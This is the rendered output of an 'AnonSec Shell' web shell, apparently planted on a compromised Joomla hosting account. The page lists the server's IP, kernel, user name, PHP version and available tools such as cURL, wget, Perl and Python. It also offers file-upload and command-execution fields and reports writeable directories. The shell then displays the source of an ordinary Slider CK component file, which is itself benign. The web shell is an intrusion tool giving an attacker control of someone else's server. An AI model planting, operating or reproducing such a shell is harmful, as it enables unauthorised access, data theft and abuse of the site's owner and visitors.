AnonSec Shell
Server IP : 46.105.57.169  /  Your IP : 216.73.217.8
Web Server : Apache
System : Linux webd003.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : maitricfuz ( 93378)
PHP Version : 8.4.22
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/maitricfuz/www/saint-martin-lg/components/com_sliderck/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/maitricfuz/www/saint-martin-lg/components/com_sliderck//sliderck.php
<?php
/**
 * @name		Slider CK
 * @package		com_sliderck
 * @copyright	Copyright (C) 2016. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 * @author		Cedric Keiflin - http://www.template-creator.com - http://www.joomlack.fr
 */


// no direct access
defined('_JEXEC') or die;
require_once JPATH_ADMINISTRATOR . '/components/com_sliderck/helpers/defines.php';

// load the needed libraries



// Access check.
if (!\Joomla\CMS\Factory::getUser()->authorise('core.manage', 'com_sliderck')) {
	throw new Exception(\Sliderck\CKFof::_('JERROR_ALERTNOAUTHOR'), 403);
}

// loads the language files from the frontend
$lang	= \Sliderck\CKFof::getLanguage();
$lang->load('com_sliderck', SLIDERCK_SITE_PATH, $lang->getTag(), false);
$lang->load('com_sliderck', JPATH_ROOT);

// loads the helper in any case
include_once SLIDERCK_ADMIN_PATH . '/helpers/sliderck.php';

// Include dependancies
jimport('joomla.application.component.controller');

$controller	= \Joomla\CMS\MVC\Controller\BaseController::getInstance('Sliderck');
$controller->execute(\Sliderck\CKFof::getApplication()->input->get('task'));
$controller->redirect();

Anon7 - 2022
AnonSec Team